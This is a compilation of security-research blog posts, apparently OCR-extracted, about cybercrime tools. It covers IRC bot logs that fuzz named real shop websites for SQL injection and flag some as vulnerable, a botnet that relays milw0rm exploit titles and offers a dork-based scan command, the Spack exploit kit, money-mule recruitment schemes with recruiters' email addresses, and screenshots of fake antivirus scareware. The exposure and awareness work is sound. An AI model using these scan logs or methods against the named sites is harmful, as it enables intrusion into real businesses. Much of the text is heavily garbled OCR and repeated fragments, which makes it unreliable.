) [Bot ]> [?] Trying To Fuzz http://www. jst .de, ‘/prodt ‘s/sh .php?c 
(I [BoT]> [t] Trying To Fuzz http://www.) sit .ca, iop.ph) :atid &prodi 
A) [BOT ]> [t] Trying To Fuzz http://www.: aja o.ut chop.pl ‘cati 21 
a [Bot ]> [t] Possible MySQL Vulnerable ' sit > hi i://wwm lrumj = .co.uk 
A) [Bot ]> [?] Trying To Fuzz http://www.| 2st s.ce ‘shop.; i?Cat =151 
A) [BOT ]> [?] Trying To Fuzz http://www.: sok om/s ip.php’ itid= tkact= 
A) [BoT]> {[t] Trying To Fuzz http://www.: the tme. m/shoy ihp?c id=268 
A) [BoT]> [?] Trying To Fuzz http://www. 2t- nitt ‘.com/s ip.ph catid= 
A) [BoT]> [*] Trying To Fuzz http://tosh ich  .cor tain/ht ‘/sho php?ca 
A) [BoT]> [*] Trying To Fuzz http://www.| isi ter. ‘.uk/sl i.php atID=4 
a) [Bot ]> [?] Trying To Fuzz http://www. erf h.ce au/sht php? tid=82 
A) [BoT]> [!] Trying To Fuzz http://styl) ses n.ct ‘shop.j i?cat =12 
A) [BoT]> [?] Trying To Fuzz http://www. scp  .uk, iop.phy ‘atID 
a [Bot ]> [t] Trying To Fuzz http://www.: te. shog shp?cai |=14& =3269 
A) [BoT]> [?] Trying To Fuzz http://shop: iar  .net ‘hop.pl ‘cati 28 
a [BOT ]> [t] Possible MySQL Vulnerable ' sit > hi i://sht jigha or.net 
A) [Bot ]> [] Trying To Fuzz http://www.: ssa .de, iop/sht php? tid=38 
A) [BoT]> [?] Trying To Fuzz http://www.t <in it.c shop ip?ea d=6 
A) [BoT]> [*] Possible MySQL Vulnerable ' sit > ht i://wwm iopki onit.c 
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C@NULLLBOTJ> AlpHaNixX L'J Possible MySQL Vulnerable Website -> http://chocolat-du-nonde 
(@Nu11[BOT]> AlpHaNixX [*] Trying To Fuzz http://www.lastfootwear.com/shop .php?catid=8&s 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://supportshop.nl/shop.php?catid=3 
(@Nu11[BOT]> AlpHaNix [¢] Trying To Fuzz http://www .hengstler .de/de/products/shop.php?c 
(QNu11[BOT]> AlpHaNix [¢] Trying To Fuzz http://www.liquitech.ca/shop.php?catid=Sé&prodi 
(QNu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.drunjan.co.uk/shop.php?catid=21 
(@Nu11[BOT]> AlpHaNixX [t] Possible MySQL Vulnerable Website -> http://www.drunjam.co.uk 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.honest jons.com/shop .php?CatID=151 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.oursoko.com/shop .php?catid=Arteact= 
(@Nul11[BOT]> AlpHaNix [?] Trying To Fuzz http://www.southcoastme .com/shop .php?catid=2 68 
(QNu11[BOT]> AlpHaNix [¢] Trying To Fuzz http://www.sweet-furniture.conm/shop.php?catid= 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://toshopinchina.com/main/home/shop .php?ca 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.bendsinister .co.uk/shop .php?CatID=4 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.cyberfresh.com.au/shop.php?Cat1D=82 
(QNu11[BOT]> AlpHaNix [¢] Trying To Fuzz http://styleobsession.com/shop.php?catid=12 
(@Nul11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.thewcp.co.uk/shop.php?CatID=2 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.imate.hu/shop.php?catid=14&id=3269 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://shopgigharbor .net/shop.php?catid=28 
(@Nu11[BOT]> AlpHaNixX [*] Possible MySQL Vulnerable Website -> http://shopgigharbor .net 
(@Nu11[BOT]> AlpHaNix [*] Trying To Fuzz http://www.chissanti.de/shop/shop.php?cat1D=38 
(@Nul1[BOT]> AlpHaNix [¢] Trying To Fuzz http://www.hopkinsonit .com/shop.php?catid=6 
(@Nu1L1[BOT]> AlpHaNix [?] Possible MySQL Vulnerable Website -> http://www .hopkinsonit .c 
Stay tuned! 
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19.2.7. A Peek Inside the Spack Web Malware Exploitation Kit - An Analysis 
(2023-02-06 23:10) 
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(se Spack - Mozilla Firefox 


cnfadmn.phio 


| 


ay 02.26 


Dear blog readers, 


I’ve decided to share with everyone several sample screenshots of the infamous Spack web 
malware exploitation kit with the idea to raise everyone’s awareness on the ease of use and 
easy to implement mass client-side exploitation tools on a mass scale. 


Sample screenshots include: 


[2] 
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Upon purchasing any of the packages offered, a custom and non-existent brand logo and 
related company information will be used on the top of the templates currently offered. 


Pantin Real Estate 


Penta Real istate. 


Why & Panames wo attractwe Our Services ! Careers 1 dowus 


Penia Real state ©2007 Privacy Paice | Terme cf une! Contacts 


Let’s expose some of the bogus brands using these campaigns, whose spamming campaigns 
have been actively recruiting new money mules over the past couple of months. For instance, 
the last template - see attached copy of the original one - is currently being used by a company 
known as Panin Real Estate - panestate .com - 194.0.200.15 - Email: disperswave@gmail.com. 
The site is currently localized to English; Italian (panestate .com/index _it.html); and Spanish 
(panestate .com/index _sp.html). 


It gets even more interesting when we start analyzing their spam campaign, currently 
localized to German. For instance, it appears that the customer of the managed money mule 
recruitment service is using their basic package, since 99 % of their soam emails are using 
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Stay tuned! 
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19.2.8 A Peek Inside a MilwOrm Syndicating Remote Execution Flaws Exploitable IRC 
Scanning Botnet - An Analysis (2023-02-06 23:10) 


<Scan_Google> [Help] Scan Command : tscan <bug> <dork> 

<Scan_Google> [Help] Milw6rm Latest exploits : tmilw6rn 

<h3x8z501> tmilw6rn 

<Scan_Google> [milw@rm] Latest exploits : 

<Scan_Google> [milw@ra] A-shop <= 6.76 Remote File Deletion Vulnerability - 
http://www. milw6rm.com/exploits/4198 

<Scan_Google> [milw@rm] phpBB Module SupaNav 1.68.6 (link_main.php) RFI 
Vulnerability - http://www.milw6rm.com/exploits/4197 

<Scan_Google> [milw@rm] Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote 
Denial of Service - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] BBS E-Market (postscript.php p_mode) Remote File Inclusion 
Vulnerability - http://wow.milw6rm.com/exploits/4195 

<Scan_Google> [milw@rm] Joomla Component Expose <= RC35 Remote File Upload 
Vulnerability - http://www.nilw6rm.com/exploits/4194 

<Scan_Google> [milw@rm] QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection 
Vulnerability - http://www.milw6rm.com/exploits/4193 

<Scan_Google> [milw@rm] Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection 
Exploit - http://www.milw6rm.com/exploits/4192 

<Scan_Google> [milw@rm] Pictures Rating (index.php msgid) Remote SQL Injection 
Vulnerbility - http://www.milw6rn.com/exploits/4191 

<Scan_Google> [milw@rm] Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) 
Insecure Methods - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] Expert Advisior (index.php id) Remote SQL Injection 
Vulnerbility - http://www. milw6rm.com/exploits/4189 


Who would have thought? An IRC based botnet that’s directly syndicating remotely 
exploitable flaws and actually scanning for them using an IRC based bothet? Takes you back 
doesn’t it? This has been a daily practice since practically 2008 and I’ve decided to share 
some sample screenshots of the process in action. 


Sample screenshots include: 
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<Scan_Google> [Help] Scan Command : tscan <bug> <dork> 

<Scan_Google> [Help] Milw6rm Latest exploits : tmilw6rn 

<h3x8z501> tmilw6rn 

<Scan_Google> [milw@rm] Latest exploits : 

<Scan_Google> [milw@rm] A-shop <= 6.76 Remote File Deletion Vulnerability - 
http://www .mnilw6rm.com/exploits/4198 

<Scan_Google> [milw@rm] phpBB Module SupaNay 1.6.6 (link_main.php) RFI 
Vulnerability - http://www.milw6rm.com/exploits/4197 

<Scan_Google> [milw@rm] Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote 
Denial of Service - http://www.milw6rm.com/exploits/ 4196 

<Scan_Google> [milw@rm] BBS E-Market (postscript.php p_mode) Remote File Inclusion 
Vulnerability - http://www.milw6rm.com/exploits/4195 

<Scan_Google> [milw@ra] Joomla Component Expose <= RC35 Remote File Upload 
Vulnerability - http://www.nilw6rm.com/exploits/4194 

<Scan_Google> [milw@rm] QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection 
Yulnerability - http://wow.milw6rm.com/exploits/4193 

<Scan_Google> [milw@rm] Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection 
Exploit - http://www.milw6rm.com/exploits/4192 

<Scan_Google> [milw@rm] Pictures Rating (index.php msgid) Remote SQL Injection 
Vulnerbility - http://www.milw6rm.com/exploits/4191 

<Scan_Google> [milw@rm] Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) 
Insecure Methods - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] Expert Advisior (index.php id) Remote SQL Injection 
Vulnerbility - http://www.milw6rm.com/exploits/4189 


Stay tuned! 
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19.2.9 A Peek Inside a Gallery of Fake Security Software Circa 2008 Screenshots - 
An Analysis (2023-02-06 23:11) 
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Personal Antivirus 


Best Spyware Protection. Used by Millions World Wide: 


vary week People worldunde use and trust Personal Antivrus to protect thee PCs tom 


Less memory use than the average used by competing products 
PC Secunty with industry leading wus. spyware and Srewall protecbon 


Ease of Installation and Support 
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An image is worth a thousand words. 


Sample screenshots include: 
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Protect against spyware, 


popups, and show performance. 


What Es Uitra Antivir 2009 ? » 
What ls Soymare? 
Sars of Sovware 

How do I get tra Anti 20087 


Ultra Antivir 2009 detects and removes harmful prograns 


Uarre Aceves 2000 uses edvenced NOCIRCIRY b> Ses kien cn asbanae enema by 


the activity on your PC Ura 2009 technology i able to hurt 
threats. 


down and paralyze new and dever 


Utra ArbiVe 2009 helps protect your computer against pop-ups, slow performance, and 


Benefits of using Ultra AntiVir 2009 include: 
Spyware and harmful files detection and removal 


Utra Arter 2009 quickly and easly finds spywere and cther harmful programs that can 
sow Gown your computer, Gsplay annoying Dop-ue ads, Change Internet settings, oF 
munuse your private informabon without your consert. 

Utra Arie 2009 elemnates Setected spyware easily at your drrecbon. 


are Nek 200) allows you ve SRSA TAR Seeaeaes bee ree eer nS 
convermert for you, whether «'s on-demand or ona ‘that you set. 


Improved Internet browsing safety and security 
Untra Arcive 2009 helps stop spyware before « installs Aself on your computer, 
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Local Disk (C:) Gp td 0) 
@ Security threat 
WARNINGI!! Scan results [|| 
OVO-RAM Drive (E:) 
2a) WARNING! 
@ Security threat \/ Windows has been infe 


Name 


mis 


System Soap Pro Spyware Avarage 
AntiLamer Light Spywere Average 
MC 30 Day Spyware Danger 


Softéther 


I-WormNetSky.q Virus 
I-Worm.Bagle.n Virus High 
Tofger-A Virus Citkal 
Zinx-A Spywer 


B-S Spy 1.90 
KrAIMer 1.1 


8 Warning!!! 364 infected files found 
Click the “Erase all threats” button to erase ail spyware and viruses from Windows 


@ Erase all threats 
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© Doctor Anitvirus 2008 


Doctor Antivirus 2008 


Protect your PC 


o Registration @) Support 


Cll System Scan 


oO : c:\Program Files This Trojan downlos... Trojan-Clicker. Win3.. 
[ Security Backdoor Hidden Desktop This Trojan is desig... Trojan-Proxy. Win32. 
- @ Spyware C:\WINDOWS This Trojan is desig... Trojan-PSW. Win32... 
( ts Privacy Backdoor Hidden Desktop This Trojan is desig... Backdoor.'Win32.Aq.. 
; — Backdoor c:\Program Files This is a family of b...  Trojan-Clicker.HTML. 
~ - Spyware C:\WINDOWS This Trojan program... Trojan-Downloader, . 
| Update ®@ Spyware c:\Program Files This Trojan is desig... Trojan-Dropper.M5.. 
7 @ Trojan autorun This Trojan provide... Trojan-PSW.Win32... 

(ty Settings © Spyware Hidden Desktop This Trojan opens a... Trojan-Proxy.Win32. 
- © Trojan Hidden Desktop This Trojan is desig... | Trojan-Dropper.MS.. 
oa Spyware ¢:\Program Files This Trojan uses sp... Backdoor. \Win32.Liv.. 


autorun This Trojan launche... _ Troian-Proxy.\Win32,_~ 


(AQ) Seanprogress 
scorerg: EE 


Path: c:\Documents an...onlinestores.metaservices.microsoftf1].txt 


Get full real-time protection 


Infections Found: 40 


EE} Save Report 
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*, Doctor Anitvirus 2008 


PY Doct antivisuc 200 


“ Protect 


GIT syster 


“ Settin« 


Doctor Antivirus 2008 


WARNING 40 infections found !!! 


Last scan detected malicious programs (4), viruses (6), adware (18), 
spyware (5), tracking cookies (7). 


These harmful programs can cause: 


x] System crash 

€ Permanent Data Loss 

€ System startup failures 

© system slowdown 

€ Internet connection loss 

x] Infecting other computer on your network 


It is highly recommended that you remove all the threats from your computer immediately. 


To remove these threats immediately. vou need to regster Doctor Antivirus 2008 
To do so, cick Remove all threats below. 


(Leerssen ] _covtnourwonetnt _| 


wetness 
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tals 
pjan-Clicker, Wins... 
pjan-Proxy. Win32. 
bjan-PSW, Win32... 


bjan-Clicker.HTML. 
bjan-Downloader, . 
bjan-Dropper.M5,. 
bjan-PSW. Win32... 


[5 x! 


q x ®) Support 


kdoor..Win32.Aq.. 


pjan-Proxy. Win3Z. 
bjan-Dropper.MS.. 


door. Win32.Liv.. 
bian-Proxy.\4 wa ha 
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Basic signs of Spyware infection 


What ls Spyware 
- if he anawer to one of these quesSons ts “Yes™, then pou are protatty infected. 
Seyware the a virus Gb a mahoous 
SoRware plarted on your PC by a Burd 1 Your computer has stowed Gen 
2 c? 
SAYS CSIR SOCITY ONE ee 2 You internet connecton speed has decreased 
you Go onkine 


a You have dowrioaded music of sofware fron the Wed 

Once yout Browsing Nabes are 

anahted you are Sooded wah 4 You get Popups and annoying ads ahen you re online or Lometmnes even ofiine 
endess Commerciats, Popups and 
Spam fom inside your PC? 


Your Getauit horne page has been changed to the one you didn't ast for 


6 You have an extra tooiar mnstalied. and you dont know where ¢ came from 
Seyware ats0 Cramatcaily shows 
down pour Compafer and internet 
cCommecbon speeds 


You receive more span emats an ever 


Soyware cosects pour pvate 
inforMabon and sheats yout iGerdty 
Dasswords. rect card Getals and 


Satisfaction guarantee 


SHOP safety at worn Spreral eo! evertet Com wih he Spyware 
Preverter 100% satstacton guarantee for any reason you are 
Not Nappy wih your purchase surely cortact our Customer 
SUP OM Stal wetwn 30 Gays. and we wil refund 100% of he 


Need Help? PUrCNase PACE WIN NO Quesbons ashed AL 
your secunty and saestacten come 
You Nave a protien wih) fest H youre unhappy wate ufiangy and wet make sure Dut 
@ your purchase or you wont happen 
need ney? 
Cah here 
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+5 Power Antivirus 


| Basic signs of 
Spyware infection 


ee ars ave re Of these 
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2008 New Version! 


Ful Windows XP Service Pack 3 & 
Vista Compatibility 


eAntivirusPro is a powerful mix 
of Anti-Malware, Anti-Virus, Anti-Trojan, 
Anti-Backdoor, Anti-Worm and Anti-PornoDial 


yocecs Spyware SCH 
Monboring 


in one program. It will protect you from all types of 


Viruses on your PC 


Main Overview Company 


What is spyware? 


Spyware. like a virus, ts a malicious so@ware planted on your PC by a 
third party in order to secrefy monior what you do online. Once your 
hatets are analyzed, you are flooded wih endiess 
Commercials, Popups and Spam from inside your PC! Spyware aiso 

Gramatc ally siows down your computer and internet conmection 
speeds. Spyware cotects your private information and steals your 
identty, passwords, credit card detals and other financiat data 


eAntivirusPro key features 


Full Windows XP Service Pack 3 Securtty Center Support! 


Rescue Scan Technotogy - Vth Um s fegh speed scan rescue yours PC 
trom Viruses for trey seconds! 


Ullmate Live Update . Fach 2 hours anb virus bases and modes are 
Completety updated. elntrarusPro stands sentinel over pour privacy and 
rerety! 


@AntivirusPro finds out and removes more than 100000 Trojan 
horses, Spyware, Viruses, Hackers, Adware, Keyloggers and 
another harmware 


@ANtIVITUSPrO allows scan Mes Quickly and access other 
features eArmuinusPro Owecty tom Wirdows Explorer 


Removes “active trojan” from a disk even i it ts Diocling the fie. 


Removes trojan tes are locked for writing (for example OLLs 
being used). 


Best backdoor and worm protection 
Sugeerts compressed thes scan 
Reports and Activity Log functonaitty 
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Gmail accounts, in fact, one of the spam campaigns is relying on the very same email that 
[9]the domain panestate .com has been registered with - disperswave@gmail.com. 


Brokerage services mctude suppert nm 
duyrg/aeling of shares on benait cf the 
— mre 


Tremaperency Of Cepestory serwces 


Fates Pen o. pketer ty he nteresing 
Chere me Pond bry 
resrctocs «more 


Feel Be comvenence of Assets Tryst 
Upnagerent pnt Ihe Teed me yen 
yoo more we 


Beicorne to our Web site. 


A sample of the spammed recruitment email: 

"Liebe Bewerber! Sind Sie schon mude von solchen Briefchen, in dem man Ihnen einen 
Arbeitsplatz anbietet? Ich weiss das. Deshalb mochte ich zuerst Sie um Verzeihung bitten. Ich 
habe aber eine freie Vakanz und mochte sie Ihnen anbieten. 


Wenn Sie noch keinen Arbeitsplatz gefunden haben, schreiben Sie bitte mir an meine E- 
mail Adresse: Als eine Bestatigung brauche ich auch CV und Ihre Telefonnummer, damit ich 
mich mit Ihnen in Verbindung setzen konnte. Vielen Dank fur Ihre Zeit und Ihr Interesse! Alle 
weiteren Informationen bekommen Sie per E-Mail. Mit freundlichen Grusen" 


Related Gmail accounts used by PanIn Real Estate money mule recruitment incorpo- 
rated: 

[10]pancorporate @ gmail.com 

[11]paninwork @ gmail.com 

[12]paninde @ googlemail.com 

[13]panamajeld @ gmail.com 

[14]paninajob @ gmail.com 
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“=¥ Antivirus XP 2008 


[10] 
26563 


Windows Antivirus 


a 


Herne Downkad |" Buy Now Help 


What is Spyware 


Spyware, tie a virus, is a mabcious 
so@ware planted on your PC by a Pars 
panty in Coder to secrety monitor what 
you 60 online 


Once your browsing habits are 
anaiyced. you are Booded wih endess 
Cornmerciats. Popups ant Spam tom 
inside your PC! 

Spyware iso Gramamcaly stows Oown 
Our Computer and Intemet commecton Basic signs of Spyware infection 


If the answer 10 one of Ihese Quesbons i “Yes™, hen pou are probably infected. 


‘Spyware collects your private 
informaben afd steals your sentity 1 Your computer has slowed dawn 


PASSwOrds, COUGE Card etats aNdcHer — 2 Your Internet connection speed has decreased 


 STARTFREESCAN | 2. You have downloaded music of sofware from the Wed 
4 You pet popups and annoying ads when you're ontine or Lometmes even ofine 
5. Your Getautt home page has been changed to the one you Giant ask for 
6 You have an exta too@ar installed and you dont know where @ came fom 
QR p00 + eatadiaeniabagainiaatidhbdiagt 
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@ SLL Connection 
Privacy Guarantee 


Green A and make 
= doa you 


whatever ¢ i. I bots ample - 
just 2 dollars, bet t's a good mew start! 7? 


meec-= vrei gr siisbaieiaiini 
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a SumejorAntivirus — 


ate 

a descarga rapeda 

Que analiza y elimina ticérnente tos archives innex 

(4 programa borrars todos esos archivos que ponen @ 
sistema 


DESCARGAR AHORA 


Su protteme (Quaén neces a Summepor Armtaaeus 7 


Surmepotentvirus @4th Grigio & aQueICS UtUaOS Que DED Aan actvarmerte Con su PC SumejcearOveus est) Giigeeo a 
Navegan por Internet y por efo Corren ef NesQo de ter infectados La presencia de virus savetos ULUENOS Que DUST aN 
PUPS? Producit ciertos Prodlemas el sistema Srjaté Ge funcionar, su infcematién proteceidn pate sus Computadoras 
Dersonal comme datos de tanetas Ge crécts serd SuStaiiay os Pop-Ups NO Gejarén Si tu PC a menudo se ve Mecteda 
de rrobestarto. for los ataques de virus y guEaneS 

ormstcos oO Si tus xtvidades en 
Nuest: a veteran iiternet son registadas, ertences 
este es ef sofware indx ad0 
Trabaje (On Seguridad ynavegue 
por Intemet sin preocupaiones 
Con Samepitedvirns estaca 
protege cortra 900 tipo Oe 
amenacat! 


Sumenintvirus le permite controlar su PC Si tu Cormputadora 6 su herrarrventa 
cobdana mis valosa, tanto en ef hogar Como en la china, esta solide le encantare 
ya que anaizars e! sistema en busca Oe virus y matware, evtard la mratitn de tu 
Dtivaticad y protegers la PC 


Pettees $4 Pevanded | Tarmnes y Conmeoses | Combate to PPR GM © POD Mom Denaraton TerPasiegien IIR) ine Teton lot Gorechos sen ntes 
Live ees. 
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PCAntivirenLoesung 


SCHUTZEN SIE IHR 
SYSTEM VOR VIREN 
SOFORT! 


Ohne Viren leben! Q So 


Haus 
Support 


Sofort kaufen 


IHR PROBLEM WER BRAUCHT PCAntivirenLoesung? 
PCArbvrerLoesung wurde tpezet fir Ge 
Menschen proOutiert, he shiv itre PC's 
berstzen, im internet sutfen und Viren 
wtangen hann Viren ktnren fw System 
sutser Betied tetzen, lastoe Popup 
in! itee Outen vernknten 
omen 28 
arenes stenien 
UNSERE LOSUNG 
PCAr@vrertcetutr hat itnen Korecie 
Ger Pen PC zy erhatten Falis Ite PC ein 
nstument Meer Lagi nen Arbed ist, 
nn Sie diese Prograrren, wed es 
oe Viren, nternetangriien und 
Specnageprogrammen ichiet 
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Votremeilleuranti 
& Virus 


Le epetileur entivwus 


Accueil PROTEGEZ VOTRE 
SYSTEME DES VIRUS 
MAINTENANT! 


Assistance 


Achetez 
masntenant 


Fonctions principates 


* Found la protection eficace contre tous les virus, vers et 
ovens conus 

* Préviert votre PC de la pénétraton des espiors et 
pubéxiets et protege completemnent vote cortidentaite 

* Détrut les pop-ups enruyartes avart quieles se charpert 
Gans vowre PC 

* Anaiyte téguibbrement vote PC en virus of autres logiciels 
matvedtarts: 

* Mat 4 jour les bases Oe Gonnbes vrales 

* Garant latsistence aux chents profetsionnetie gratute 


Votre probleme 

Votreltemieuarivirus a éth créé pour ceux qui Utisend langement leurs ordinateurs personnels, pour ceux Qui naviguent sur internet 
tt sont en danger dintecton Le systimne de votre PC peut Severs: inopérant 4 cause des virus, vos données perscnnetes, ¥ 
Compets Mefermaton sur les Canes Oe croc, peuvert de voldes Cu Dien vous pouver dire enruye des Pop-Ups NON Obsinbes 


Notre sotution 
VotreitemeuArovrus vous permet de contdier compitemert votre PC Si votre ordinateur est un cul précieur de vore travel ou de 
Sots, vous apprécierez ce programene, parce quit garde vole systbmne des virus ot autres programmes maivediants 4 aide des 


anaiyses régubéres, aussi, ¢ vous protege des wiolstons de votre conidertalee ef vous fournt une protecton complete ef eficace 
OP vote cecinateut 


Voreie@euArbvrus est pour ceux Gul veutent protéger leurs ordinateurs Si votre PC est souvent ataqué Oe virus et de vers et 
QueiguUn estate Oe Sule vos activites Sut Internet, aces, Ce logiciel est pour vous. Travadiez en sécurté et uthser Internet sans 
wuCUne Inqubtide Aves Voreie@euArOrrus vous bes protepe contre toutes les menaces exstartes! 
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klantenondersteuning Koopnu § Login 


BESCHERM UW SYSTEEM NU TEGEN DE VIRUSSEN! 


PC Bevetepings sysihem werd speciaal Ontworpen voor PCBevetapings systeem maaht het woot u mogetyh 
Ge gedrubers die actef hun corrouter petruscen en voor om volle@g uw PC te comPoleren Ais uw PC uw 
ieGereen Ge in het wed su en nsico bopt om door de frvesl wardevote Mpiper in Net daaginkse leven is 
virus sen besmet te worden Uw eyiteem kan Truss en op het werk, dan is dt de oplossing voor u 
NOPETAbCMES! 1ahON GOCE OF 4ChaSeighe iNMiDed Van de het howd? uw system vrij van Ge vieussen en 
VITUS SON, UW pertocnivke gegevens, Z03!5 aerial malware doormeddel van regeimaige 
haathummers en gegevens, hunnen gestolen worden Starnes, Deschermt u tegen Oe Schering van uw 
en y bare lastpgevalien worden Goce Ge irtante en Brwvacy en Diet volledpe Descherrung aan uw 
Cogewerrste pOpLDs syiteern 


J 


We heeft 'PCBeveilic em nodig? De sleuteleigenschappen 


Bevemgings syiteem 1s voor de peteusers de tun + Long voor cen etiectseve beschermng tegen se 
C's fark werrsen te eschermen legen de virussen Als gekende erusten, wormen en Trowaner 
Uw PC regeimatg door de virusten en wormen + the een ettecterre tercherneng tegen de rtraat © 
BAN evatlen word dan word! U NOOgsBwaaes Chepniyn uw PC door de spywaereiadware on beocheret uw 
Goce emand sangeraten die uw mbernetactyteten pussy 
wert ha te vOlpEn ef Hi deze soMwarte Oe Oftod tity Nareatyp Go vervelandie papUps Your 28 Gp ew octane 
voor U Werk vemig en gebruik het internet onder angst nyc 


~ + Scart regeimatig uw PC op vrutnen en matware 
Met PCOevemipings syiteem bert u Deschernd tegen » Update €0 veunserqngeveraheatand en i 
wie Destaande Dedregngen! bestercer 


jarardeert perscorige en grate kinrtencnder theureg 
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SOFTWARE FAQ CONTACTS 


Aauhdrve 2009 on sueré-winving eprawe renee iliy wil help yeu fighting ali linds of spyware and adwere 
inchsding keylogpers, trojan horses, password threves and 


Ant?SpywareGuard - COMING SOON! 
sadiseyweresoaey ls Catleneis sewiin vou ulhe the Runeattevel of pevtacton Spree aacoNs eevee Ene 
malware including heyloopers, Mjackers and downloaders. 
it ee retpeerentree al geet erie tertee  ee  Bop a t 
protection for your comeater wth our advanced AntiSpywareGuard Guard real-time mongor. 


ceograms 


PopupNukerPro ~ COMING SOON! 


PopuptiuberPro is a au.tting-edpe p¢p-up and ad banner blocking software which automatically identifies and 
troubleshocts unnecessary windows. This anti-popup innovative solution will prowde professional assistance in 
ehemmnating aterryerg elemerts before they reach your system! 


XPBooster - COMING SOON! 


Rooster ts a complete soktion that keeps your system Clean and error-free by repairing corrupt files, detecting 
errors Om your Grives, and regularly removing unneeded data from your PC. XPBooster protects your system and 
preverts arry potertial problems and damages. 
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Antivirus 2009 Protection 


WERVEW FEATURES COWMLOAD RIGISTERWOW AITRIATES suPPORT 


You need ws program because it's ureque, eflectve and atle to compete with many 
well Lnown large soM@ware Compares. M Certainty should be mstabed on your PC - 
and you wil forget about Spyerare and Adware wreckers, Thes is the Dest protection 
softerere of today among other existing, $0 use toe scan 


About $2% of all PCs are infected with threats that can't be 
———— identified by most security programs. 


as Nobody's safe today! Who can say for sure that his PC is 
notintectea? 


Latest threats 


The latest researches prove that 92% of all home PCs are under the threat of 
intecton, the man source of wtech is $9 the Internet, The vast majorty of Internet 
users fall for the batt of venous trading Companies and Commercial websites wtech 
make large scale Ostruson of viruses Ususiy, these viruses get to inexperienced 
users Ineough “treect charge” softerere products. 


So, what is Spyware? 


aes = 


© AS S00n 2 it's notbced that you are Innemmet amateur who tikes to beowse 
Doundess Open spaces of the internet, pou wil immechatety recerve 8 huge 
heap of dflerent information (Commercials, Popups and jprst Spam) trom 
irekde of pour PC! 


Spyerare may harm your PC efficiency and slow the speed of transfer into the 


find out more 


‘They penetrate inao your PC from websites you visi, spar, even with hidden 
IP: 81,169.174,178 203508 of Bcense programs you had nstated. The place of mfecton aways 
fomains not defined. Some Arivirus of firewall programs Cannct find m at ait 
Why choose Antivirus 2009 Protection? 


AnDviTUs 2009 Protection Is 2 Jeading program worldwide: 


© Diseiqe prope wen en cnand ter belgie rvees ms emcee, 
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Antivirus 2009 


Roms processed 282 
ERRORS FOUND: $8 


- Local Disk (C:) - Local Disk (0:) Local Settings 


@ system errors —— ic no errors @ infected 


(MALWARE THREAT 


Scam results ; no virus detected 


Coprrtght © 2007 - 2000 X> aativivws | All Rights Reserved 
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[15]pananmakarriere @ gmail.com 


The same spam template localized in German is also known to have been used with 
the following Gmail accounts, again operated by money-mule recruitment organizations: 
[16]trzzbuded @ gmail.com 

[17]robertojens @ gmail.com 

[18]gradtul @ gmail.com 

[19]hrmiket @ gmail.com 

[20]mike.torhr @ gmail.com 

[21]evkoreyds @ gmail.com 

[22]mike.torhr @ gmail.com 

[23]support @ oplusdevelopment.com - the only exception 


The [24]second template used in the wild - the site returns a 404 error message - is called 
Green Star Services website, with the customer apparently still in a testing phrase. 


INTROOUCTION STRUCTURE OUR SERVICE CONTACT US PORTTOUO ul 


BRAND IMAGE 


@ INTRODUCTION > OURSERVICE 


2009 BRAND MAGE. inc. Al Rights Reserves. 


This cannot be said for yet another customer of the same service standardizing the money 
mule recruitment process by template-izing it. [25]The fifth template, is actually a bogus com- 
pany called Brand Image Advertising Agency (internationalbrandimage .com - 91.213.72.142 
- Email: Sergey Stepanov; userovsky@gmail.com describing itself as: 
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J) e-Kerberos 


Dene Abeer? 


What is eKerberos? 


Overview Purchase 


Download Features 


Why is eKerberos better then standard 
antivirus programs? 


Technical features 
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System Secunty is your comprehensive, al-n-cne securty schuBon Quarding your system apainst spyware 
FEUSIONS. aNNrytng aOware Kienbty fhe® and all fonds of matware brooding on he net today Comtenng 


savanced remor . wi) state-cl-e-ant nceiery ated protecban module 
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TotalVirusProtection —— 


Malware Security Scanner 


The TotalVirusProtection can resolve the 
following problems 


Our antrwus 4 


the pts 
the 


armwus +e 


Data Security 


Every seven days cur program 15 sutomancals 
Feofessionals, working hard on thas product 
final secunty povelpes We ane proud of our 
protected 
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Download Buy ontine 


CA DEFENDER 2009 


spywa 


Get rid of mailware now! 


Click here to start free scan bod ne 


About WinDefender 2009 


Windefencer 2009 mas designed from the core a5 2 srgie, 


Dy analyzing Code execution for malicious intent - keeping you ahead of the makware-wrters. 


30 day money back guarantee 


uy 2 subscrption today and get a ful 30 day money back Quarantee, Wth a subscrotion you pet 
Denmanent, easy and professional protection from wruses, Naciuers and datadoss. 
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ur curren ndows antivirus g 


hon and engoy your 
rare and vrures 


$ How XP antivirus can help you? FasEean a 


Home xP antvirus 6 designed to provide you with the highest level of protection 


agers makoous Spyware and matware Including keyloopers, Njackhers and 
About Product Gowrioaders. * 
Dowrtosd XP antvrus technology protects you from both known and emerging threst Se 
Varnts and gvet you real-time protection for your computer with our infecting your PC! 


Regster Now 
advanced XP antivirus Guird real-time morwtor =r 
- START SCAN 
Set Sennen 
Keep your computer fee from trojans, spyware, adware, worms, keyooors 
fOOUUS, Galers and offer makoous programs! 


Find out right now with our 


Why spyware is dangerous? FREE SPYWARE SCAN 


Spyware & the most prevalerst reat to online comguter privacy and seaurtty It 
6S iitaied on your commuter rough websites, spam and a5 Nedden addons to 
legtmate programs you metal 


Spyware beings ots of damage in the serme of dista confidentiality. Spyware 

programs regeter every user step, both inside the system and in the Internet 
Al information & delivered to the malefactor who collects data in his, not your, 
rherest! 


